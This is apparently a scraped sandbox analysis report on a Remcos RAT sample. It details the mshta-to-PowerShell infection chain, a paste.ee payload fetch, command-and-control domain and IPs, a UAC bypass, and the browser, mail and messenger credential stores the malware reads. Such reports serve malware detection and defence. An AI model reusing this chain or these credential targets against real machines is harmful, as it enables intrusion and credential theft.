                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00404961 GetLocalTime,CreateEventA,CreateThread,12_2_00404961
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BB0E GetComputerNameExW,GetUserNameW,12_2_0041BB0E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004491DA _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_004491DA
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_004192F2 GetVersionExW,14_2_004192F2
                        Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 10.2.powershell.exe.5acb250.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.powershell.exe.5acb250.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.3706537610.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1403832641.0000000005A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1403832641.0000000005671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3824, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8328, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data12_2_0040B59B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\12_2_0040B6B5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \key3.db12_2_0040B6B5
                        Source: C:\Windows\SysWOW64\recover.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeCode function: ESMTPPassword15_2_004033F0
                        Source: C:\Windows\SysWOW64\recover.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword15_2_00402DB3
                        Source: C:\Windows\SysWOW64\recover.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword15_2_00402DB3
                        Source: Yara matchFile source: 12.2.CasPol.exe.37e0000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.recover.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.37e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.recover.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.3707861943.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.1405105210.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8328, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: recover.exe PID: 8424, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-4E8SNNJump to behavior
                        Source: Yara matchFile source: 10.2.powershell.exe.5acb250.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.powershell.exe.5acb250.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.3706537610.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1403832641.0000000005A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1403832641.0000000005671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3824, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8328, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: cmd.exe12_2_00405091
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information212
                        Scripting
                        Valid Accounts21
                        Native API
                        212
                        Scripting
                        1
                        DLL Side-Loading
                        1
                        Deobfuscate/Decode Files or Information
                        2
                        OS Credential Dumping
                        2
                        System Time Discovery
                        Remote Services11
                        Archive Collected Data
                        1
                        Web Service
                        Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts1
                        Exploitation for Client Execution
                        1
                        DLL Side-Loading
                        1
                        Bypass User Account Control
                        2
                        Obfuscated Files or Information
                        111
                        Input Capture
                        1
                        Account Discovery
                        Remote Desktop Protocol1
                        Data from Local System
                        12
                        Ingress Tool Transfer
                        Exfiltration Over Bluetooth1
                        Defacement
                        Email AddressesDNS ServerDomain Accounts32
                        Command and Scripting Interpreter
                        1
                        Windows Service
                        1
                        Access Token Manipulation
                        1
                        DLL Side-Loading
                        2
                        Credentials in Registry
                        1
                        System Service Discovery
                        SMB/Windows Admin Shares11
                        Email Collection
                        21
                        Encrypted Channel
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        Service Execution
                        Login Hook1
                        Windows Service
                        1
                        Bypass User Account Control
                        3
                        Credentials In Files
                        3
                        File and Directory Discovery
                        Distributed Component Object Model111
                        Input Capture
                        1
                        Non-Standard Port
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts2
                        PowerShell
                        Network Logon Script412
                        Process Injection
                        1
                        Masquerading
                        LSA Secrets39
                        System Information Discovery
                        SSH3
                        Clipboard Data
                        1
                        Remote Access Software
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                        Virtualization/Sandbox Evasion
                        Cached Domain Credentials31
                        Security Software Discovery
                        VNCGUI Input Capture2
                        Non-Application Layer Protocol
                        Data Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Access Token Manipulation
                        DCSync21
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal Capture113
                        Application Layer Protocol
                        Exfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job412
                        Process Injection
                        Proc Filesystem4
                        Process Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                        Application Window Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                        System Owner/User Discovery
                        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1639290 Sample: earereallyniceloverwithgrea... Startdate: 15/03/2025 Architecture: WINDOWS Score: 100 48 paste.ee 2->48 50 qwertyuioplkjhgfdsazxcvbnm.ydns.eu 2->50 52 geoplugin.net 2->52 64 Suricata IDS alerts for network traffic 2->64 66 Found malware configuration 2->66 68 Malicious sample detected (through community Yara rule) 2->68 72 19 other signatures 2->72 11 mshta.exe 2 2->11         started        signatures3 70 Connects to a pastebin service (likely for C&C) 48->70 process4 file5 44 C:\Windows\Temp\unmovably.bat, DOS 11->44 dropped 14 cmd.exe 2 11->14         started        process6 file7 46 C:\Windows\Temp\nonordinary.vbs, ASCII 14->46 dropped 98 Command shell drops VBS files 14->98 18 wscript.exe 14 14->18         started        22 conhost.exe 14->22         started        24 timeout.exe 1 14->24         started        signatures8 process9 dnsIp10 54 paste.ee 23.186.113.60, 443, 49720 KLAYER-GLOBALNL Reserved 18->54 74 System process connects to network (likely due to code injection or exploit) 18->74 76 Suspicious powershell command line found 18->76 78 Wscript starts Powershell (via cmd or directly) 18->78 80 2 other signatures 18->80 26 powershell.exe 15 15 18->26         started        signatures11 process12 dnsIp13 56 104.168.7.38, 49721, 80 AS-COLOCROSSINGUS United States 26->56 58 172.245.191.88, 49722, 80 AS-COLOCROSSINGUS United States 26->58 29 CasPol.exe 4 13 26->29         started        33 conhost.exe 26->33         started        process14 dnsIp15 60 qwertyuioplkjhgfdsazxcvbnm.ydns.eu 185.208.156.45, 14645, 49723, 49724 SIMPLECARRIERCH Switzerland 29->60 62 geoplugin.net 178.237.33.50, 49725, 80 ATOM86-ASATOM86NL Netherlands 29->62 90 Contains functionality to bypass UAC (CMSTPLUA) 29->90 92 Detected Remcos RAT 29->92 94 Contains functionalty to change the wallpaper 29->94 96 6 other signatures 29->96 35 recover.exe 1 29->35         started        38 recover.exe 1 29->38         started        40 recover.exe 14 29->40         started        42 recover.exe 29->42         started        signatures16 process17 signatures18 82 Tries to steal Instant Messenger accounts or passwords 35->82 84 Tries to steal Mail credentials (via file / registry access) 35->84 86 Tries to harvest and steal browser information (history, passwords, etc) 38->86 88 Tries to steal Mail credentials (via file registry) 42->88

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.